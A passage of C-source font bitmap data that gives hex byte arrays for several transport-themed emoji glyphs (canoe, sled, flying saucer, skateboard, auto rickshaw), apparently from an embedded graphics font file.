0x0, 0x0, 0x0, 0x0, 0x1, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x78,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x81, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x80, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x0, 0xc0, 0x38, 0x0, 0x0, 0xf, 0xfe,
0x0, 0x0, 0xe, 0x1, 0xc0, 0x0, 0x1, 0xff,
0xf0, 0x0, 0x0, 0x60, 0x1c, 0x0, 0xff, 0xff,
0xff, 0x80, 0x0, 0x3, 0x0, 0xe0, 0x1f, 0xff,
0xff, 0xfc, 0x0, 0x0, 0x38, 0x7, 0x0, 0xff,
0xff, 0xff, 0xe0, 0x0, 0x1, 0xc0, 0x38, 0x7,
0xff, 0xff, 0xff, 0x0, 0x0, 0xc, 0x1, 0x80,
0x3f, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x60, 0x1c,
0x1, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x3, 0x0,
0xe0, 0x1, 0xc0, 0x0, 0x7, 0xe0, 0x0, 0x38,
0x7, 0x0, 0xe, 0x0, 0x0, 0x3f, 0x80, 0x1,
0xc0, 0x38, 0x0, 0x30, 0x0, 0x0, 0xfc, 0x0,
0xe, 0x1, 0xc0, 0x1, 0xc0, 0x0, 0x3, 0xe0,
0x1, 0xe0, 0xe, 0x0, 0xe, 0x0, 0x0, 0xf,
0x0, 0x3f, 0x0, 0x70, 0x0, 0x70, 0x0, 0x0,
0x70, 0x3, 0xc0, 0x3, 0x80, 0x3, 0x80, 0x0,
0x1, 0xc0, 0x38, 0x0, 0xe, 0x0, 0xc, 0x0,
0x0, 0xe, 0x3, 0x80, 0x0, 0x70, 0x0, 0x60,
0x0, 0x0, 0x30, 0x38, 0x0, 0x3, 0xc0, 0x7,
0x0, 0x0, 0x1, 0xc3, 0xc0, 0x0, 0x1f, 0x0,
0x38, 0x0, 0x0, 0x6, 0x1f, 0xfe, 0x0, 0x7c,
0x7, 0xc0, 0x0, 0x0, 0x38, 0xff, 0xfc, 0x3,
0xff, 0xfe, 0x0, 0x0, 0x0, 0xc3, 0xff, 0xf8,
0xf, 0xff, 0xf0, 0x0, 0x0, 0x7, 0x3e, 0x7,
0xe0, 0x7f, 0xff, 0x0, 0x0, 0x0, 0x39, 0xc0,
0x7f, 0x81, 0xff, 0xf8, 0xf, 0xff, 0xff, 0xdc,
0x7, 0x7e, 0x3, 0xff, 0x80, 0xff, 0xff, 0xfe,
0xe0, 0x31, 0xf8, 0x0, 0x0, 0xf, 0xff, 0xff,
0xfe, 0x7, 0x8e, 0xe0, 0x0, 0x0, 0xf8, 0x38,
0x1c, 0x70, 0x7c, 0x33, 0x80, 0x0, 0x7, 0xc3,
0xe0, 0xe3, 0x83, 0xe1, 0x8e, 0x0, 0x0, 0x7c,
0x1f, 0x7, 0x1c, 0x1f, 0xc, 0x3c, 0x0, 0x7,
0x60, 0xf8, 0x38, 0xe0, 0xf8, 0x60, 0xff, 0xff,
0xf3, 0x87, 0xc1, 0xc7, 0x1, 0x7, 0x1, 0xff,
0xff, 0x1c, 0x8, 0x1e, 0x1c, 0x0, 0x38, 0x0,
0x0, 0x0, 0xe0, 0x0, 0xe0, 0xf0, 0x3, 0x80,
0x0, 0x0, 0x3, 0x80, 0xf, 0x3, 0xc0, 0x3c,
0x0, 0x0, 0x0, 0x1e, 0x0, 0xf0, 0x1f, 0x7,
0xc0, 0x0, 0x0, 0x0, 0x7c, 0x1f, 0x0, 0x7f,
0xfc, 0x0, 0x0, 0x0, 0x1, 0xff, 0xf0, 0x0,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xff, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0,
0x0,
/* U+1F6F6 "🛶" */
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x60, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xe1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe1, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0,
0x0, 0x0, 0x0, 0x8, 0x0, 0x0, 0x0, 0x3,
0x6, 0x0, 0x0, 0x1, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x38, 0x70, 0x0, 0x0, 0x78, 0x1f, 0xe0,
0x0, 0x0, 0x1, 0xc3, 0x0, 0x0, 0x3f, 0x83,
0xff, 0xe0, 0x0, 0x0, 0xc, 0x38, 0x0, 0x3f,
0xfc, 0x3e, 0xff, 0xfc, 0x0, 0x0, 0xe1, 0x81,
0xff, 0xf7, 0xc3, 0xf0, 0xff, 0xff, 0xff, 0xfe,
0xf, 0xff, 0xf8, 0xec, 0x77, 0x83, 0xff, 0xff,
0xff, 0xf0, 0xff, 0xff, 0xe, 0xe7, 0x3c, 0x7f,
0xff, 0xff, 0xff, 0x7, 0x9f, 0xff, 0xce, 0x71,
0xef, 0xff, 0xc0, 0xff, 0xf8, 0x70, 0xff, 0xf8,
0xee, 0xf, 0xff, 0xf8, 0x1f, 0xff, 0xc3, 0x7,
0xff, 0x7, 0xe0, 0x7f, 0xfe, 0x3, 0xff, 0xfc,
0x38, 0x3f, 0xe0, 0x7e, 0x1, 0xff, 0xc0, 0x7f,
0xff, 0xe1, 0xc3, 0xf8, 0x7, 0xe0, 0x7, 0xff,
0xef, 0xff, 0xfe, 0xf, 0xfe, 0x0, 0x7e, 0x0,
0xf, 0xff, 0xff, 0xff, 0xf0, 0x7f, 0x0, 0x7,
0xe0, 0x0, 0x7, 0xff, 0xff, 0xff, 0x83, 0xc0,
0x0, 0x7f, 0x0, 0x0, 0x0, 0xf, 0xff, 0xf8,
0x1e, 0x0, 0xf, 0x70, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0xf0, 0x0, 0xe7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x18, 0x7, 0x80, 0x1e, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x1, 0x80, 0x38, 0x3, 0xc1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x1, 0xc0,
0x78, 0xf, 0x80, 0x0, 0x0, 0x0, 0x1, 0x80,
0xe, 0xf, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x77, 0xe0, 0x1, 0xfc, 0x0, 0x0,
0x0, 0x0, 0xc0, 0x7, 0xf8, 0x0, 0x3, 0xfc,
0x0, 0x0, 0x0, 0xc, 0x0, 0x3e, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0xe0, 0x1, 0xc0,
0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff,
0xe0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x6, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x30, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x60, 0x1, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xf,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x83, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
/* U+1F6F7 "🛷" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x1f, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x7f, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0xe, 0x1f, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x3, 0xc0,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x78, 0x1c, 0x1f, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0xf, 0x3, 0x80, 0x38, 0x0, 0x0, 0x0,
0x0, 0x7, 0x81, 0xc0, 0x70, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x38, 0xe, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x7, 0x1, 0xc0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0xe0,
0x38, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x1c, 0x7, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x3, 0x80, 0xe0, 0xf, 0xc0, 0x0, 0x0,
0x0, 0x3, 0xc0, 0xf0, 0x1c, 0x1, 0xde, 0x0,
0x0, 0x0, 0x0, 0x78, 0x1e, 0x3, 0x80, 0x38,
0xe0, 0x0, 0x0, 0x0, 0x1e, 0x3, 0xc0, 0x70,
0x7, 0xf, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x70,
0xe, 0x0, 0xe0, 0x70, 0x0, 0x0, 0x0, 0x7c,
0xe, 0x1, 0xc0, 0x1c, 0x7, 0x86, 0x0, 0x0,
0xf, 0xc1, 0xc0, 0x38, 0x3, 0x80, 0x38, 0xf0,
0x0, 0x1, 0xec, 0x38, 0x7, 0x0, 0x70, 0x3,
0xde, 0x0, 0x0, 0x7c, 0xe7, 0x0, 0xe0, 0xe,
0x0, 0x1f, 0xc0, 0x0, 0xf, 0x8f, 0xe0, 0x1c,
0x1, 0xc0, 0x1, 0xf8, 0x0, 0x1, 0xf0, 0xfc,
0x3, 0x80, 0x38, 0x0, 0xf, 0x0, 0x0, 0x3e,
0xd, 0xf0, 0x70, 0x3f, 0x0, 0x1, 0xe0, 0x0,
0x7, 0x80, 0xcf, 0xff, 0xff, 0xe0, 0x0, 0x3c,
0x0, 0x0, 0xf0, 0xc, 0x3f, 0xff, 0xfc, 0x0,
0x7, 0x80, 0x0, 0x3e, 0x1, 0xc7, 0xff, 0xc7,
0x80, 0x0, 0xf0, 0x0, 0x7, 0xc0, 0x1c, 0xf0,
0x0, 0xf8, 0x0, 0x1e, 0x0, 0x3f, 0xf0, 0x1,
0xde, 0x0, 0x1f, 0xc0, 0x3, 0xc0, 0x7, 0xfe,
0x0, 0x1f, 0xc0, 0x3, 0xdc, 0x0, 0x78, 0x0,
0xc4, 0x60, 0x1, 0xf8, 0x0, 0x79, 0xc0, 0x7,
0x0, 0xc, 0x6, 0x0, 0x1f, 0x0, 0xf, 0x1c,
0x0, 0xf0, 0x0, 0xc0, 0xe0, 0x1, 0xe0, 0x1,
0xe0, 0xe0, 0x1e, 0x0, 0xc, 0x1c, 0x0, 0x3c,
0x0, 0x3c, 0xe, 0x3, 0xc0, 0x0, 0x61, 0xc0,
0x7, 0x80, 0x7, 0x80, 0xe0, 0x78, 0x0, 0x6,
0x1c, 0x0, 0xf0, 0x1, 0xf0, 0xe, 0xf, 0x0,
0x0, 0x33, 0x80, 0x1e, 0x3, 0x3c, 0x0, 0x71,
0xe0, 0x0, 0x3, 0xf8, 0x3, 0xc3, 0xff, 0x80,
0x7, 0x3c, 0x0, 0x0, 0x1f, 0xc0, 0xf8, 0x7f,
0xf0, 0x0, 0x77, 0x80, 0x0, 0x0, 0x3e, 0x1f,
0xe, 0x66, 0x0, 0x7, 0xf0, 0x0, 0x0, 0x1,
0xff, 0xe0, 0xc0, 0x60, 0x0, 0x3e, 0x0, 0x0,
0x0, 0x7, 0xf8, 0xc, 0x7, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0xc0, 0xe0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1c,
0x0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x60, 0xc0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xc, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x31, 0xc0, 0x7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80,
0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf0, 0x7c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0,
/* U+1F6F8 "🛸" */
0x0, 0x0, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x60, 0x7, 0x83, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xf, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xc0, 0xf, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x7, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x1f, 0xfc, 0x7, 0x0, 0xe0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xc6, 0x0, 0x70, 0x0,
0x7, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x70, 0x0,
0xff, 0xff, 0x80, 0x7f, 0xff, 0x0, 0x70, 0x0,
0xff, 0xc0, 0x0, 0x3f, 0xff, 0xc0, 0x70, 0x0,
0xf8, 0x0, 0x0, 0x1f, 0xff, 0xf0, 0x70, 0x0,
0xfe, 0x0, 0x0, 0xf, 0xff, 0xfc, 0x70, 0x0,
0x6f, 0x0, 0x0, 0x3, 0xff, 0xfe, 0x70, 0x0,
0x77, 0xc0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0,
0x71, 0xf0, 0x0, 0x0, 0x3f, 0xff, 0xe0, 0x0,
0x30, 0xfc, 0x0, 0x0, 0x7, 0xff, 0xe0, 0x0,
0x38, 0x3f, 0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0,
0x18, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x1c, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x1c, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x1e, 0x0,
0xe, 0x0, 0x1f, 0x80, 0x0, 0x0, 0xe, 0x0,
0x7, 0x0, 0x7, 0xf0, 0x0, 0x0, 0x7, 0x0,
0x7, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x3, 0x80,
0x3, 0x80, 0x60, 0x3f, 0x80, 0x0, 0x1, 0xc0,
0x1, 0xc0, 0xf0, 0x7, 0xf0, 0x0, 0x1, 0xe0,
0x1, 0xe0, 0xf0, 0x0, 0xfe, 0x0, 0x0, 0xf0,
0x0, 0xf0, 0x60, 0x0, 0x1f, 0xe0, 0x0, 0x70,
0x0, 0x78, 0x0, 0xc, 0x3, 0xfc, 0x0, 0x38,
0x0, 0x3c, 0x0, 0x1e, 0x0, 0x7f, 0xc0, 0x1c,
0x0, 0x1e, 0x0, 0x1e, 0x0, 0xf, 0xff, 0x1e,
0x0, 0x7, 0x80, 0x1e, 0x0, 0x0, 0x7f, 0xff,
0x0, 0x3, 0xc0, 0x0, 0x1, 0x80, 0x7, 0xff,
0x0, 0x0, 0xf0, 0x0, 0x3, 0xc0, 0x0, 0xf,
0x0, 0x0, 0x3c, 0x0, 0x3, 0xc0, 0x0, 0x3e,
0x0, 0x0, 0x1f, 0x80, 0x1, 0x80, 0x0, 0x7c,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x7, 0xc0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x0, 0x3, 0xfc, 0x1, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0x0, 0x0,
/* U+1F6F9 "🛹" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf0, 0x1f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x78, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf8, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0,
0x1c, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x1, 0xc0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x1, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0xf, 0x80, 0x38, 0x7, 0x0, 0xf,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x70,
0x0, 0xe0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x1c, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x1f,
0x80, 0x0, 0x1, 0xc0, 0x0, 0x3c, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x80,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x80, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0x3, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xc0, 0x1f,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xfc,
0x3, 0xff, 0x0, 0x70, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xe0, 0x78, 0x0, 0x7, 0x0, 0x0, 0x0,
0xf, 0xdf, 0x9e, 0xf, 0x0, 0x8, 0x0, 0x0,
0x0, 0x3, 0xf1, 0xf0, 0xe0, 0xe0, 0x1, 0xc0,
0x18, 0x0, 0x0, 0xfc, 0x1f, 0xe, 0xe, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x3f, 0x1, 0xf9, 0xc0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0xf,
0xfc, 0xe, 0x0, 0x0, 0x70, 0x0, 0x3, 0xe0,
0x0, 0x7f, 0x80, 0x70, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x3, 0xe0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0xf,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0,
0x7, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xe0, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x7, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7e, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F6FA "🛺" */
0x0, 0x3f, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x80, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x7, 0xf8,
0x1, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x7, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x7f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x7,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x1f, 0xe1, 0xff, 0xff, 0xff, 0xfe,
0x0, 0x70, 0x0, 0x3, 0xc, 0x3f, 0xff, 0xff,
0xff, 0xc0, 0xe, 0x0, 0x0, 0xe1, 0x87, 0x0,
0xe, 0x0, 0x18, 0x1, 0xe0, 0x0, 0x18, 0x30,
0xe0, 0x1, 0xc0, 0x3, 0x0, 0x1c, 0x0, 0x7,
0x6, 0x1c, 0x0, 0x38, 0x0, 0x60, 0x3, 0x80,
0x0, 0xe0, 0xc3, 0x80, 0x7, 0x0, 0xc, 0x0,
0x70, 0x0, 0x18, 0x18, 0x70, 0x0, 0xe0, 0x1,
0x80, 0xe, 0x0, 0x3, 0x3, 0xe, 0x0, 0x1c,
0x0, 0x30, 0x1, 0xc0, 0x0, 0xe0, 0x61, 0xc0,
0x3, 0x80, 0x6, 0x0, 0x38, 0x0, 0x1c, 0xc,
0x38, 0x0, 0x70, 0x0, 0xc0, 0x7, 0x0, 0x3,
0x81, 0x87, 0x0, 0xe, 0x0, 0x18, 0x0, 0xf0,
0x0, 0x60, 0x30, 0xe0, 0x1, 0xc0, 0x3, 0x0,
0xe, 0x0, 0xc, 0x6, 0x1c, 0x0, 0x38, 0x0,
0x60, 0x1, 0xc0, 0x3, 0x80, 0xc3, 0x80, 0x7,
0x0, 0xc, 0x0, 0x38, 0x0, 0x7f, 0xf8, 0x70,
0x0, 0xe0, 0x1, 0x80, 0x7, 0x0, 0xf, 0xfe,
0xe, 0x0, 0x1c, 0x0, 0x30, 0x0, 0xe0, 0x1,
0xc0, 0x1, 0xc0, 0x3, 0x80, 0x6, 0x0, 0x1c,
0x0, 0x38, 0x0, 0x38, 0x0, 0x70, 0x0, 0xc0,
0x3, 0x80, 0x7, 0x0, 0x7, 0x0, 0xe, 0x0,
0x18, 0x0, 0x70, 0x0, 0xe0, 0x0, 0xe0, 0x1,
0xc0, 0x3, 0x0, 0xe, 0x0, 0x1f, 0xff, 0xfc,
0x0, 0x38, 0x3, 0xff, 0xff, 0xc0, 0x3, 0xff,
0xff, 0x80, 0x7, 0x0, 0xff, 0xff, 0xf8, 0x78,
0x3f, 0xff, 0xf3, 0xff, 0xe0, 0x3f, 0xff, 0xff,
0x1f, 0x87, 0xff, 0xfe, 0x7f, 0xfc, 0xf, 0xff,
0xff, 0xe7, 0x78, 0xff, 0xff, 0xcf, 0xff, 0x81,
0xfc, 0x1, 0xfc, 0xc7, 0x9f, 0xff, 0xf9, 0xff,
0xf0, 0x3f, 0x80, 0x3f, 0x98, 0xf1, 0xff, 0xff,
0xf, 0xfe, 0x7, 0xf0, 0x7, 0xf3, 0x1e, 0x3f,
0xff, 0xe1, 0xff, 0xc0, 0xff, 0xff, 0xfe, 0x77,
0x83, 0xff, 0xfc, 0x3f, 0xf8, 0x1f, 0xff, 0xff,
0xc7, 0xe0, 0x7f, 0xff, 0x87, 0xff, 0x3, 0xff,
0xff, 0xf8, 0x7e, 0xf, 0xff, 0xf0, 0xff, 0xe0,
0x7f, 0xff, 0xff, 0x1f, 0xff, 0xff, 0xfe, 0x1f,
0xfc, 0xf, 0xff, 0xff, 0xe7, 0xff, 0xff, 0xff,
0xc3, 0xff, 0x81, 0xff, 0xff, 0xfc, 0xff, 0xff,
0xff, 0xf8, 0x7f, 0xf0, 0x3f, 0xff, 0xff, 0xbf,
0xff, 0xff, 0xff, 0xf, 0xfe, 0x7, 0xff, 0xff,
0xf7, 0xff, 0xff, 0xff, 0xe1, 0xff, 0xc0, 0xff,
0xff, 0xfe, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xf8,
0x1f, 0xff, 0xff, 0xde, 0x7f, 0xff, 0xff, 0x87,
0xff, 0x3, 0xff, 0xff, 0xf8, 0x1f, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xcf, 0xff, 0x7, 0x1,
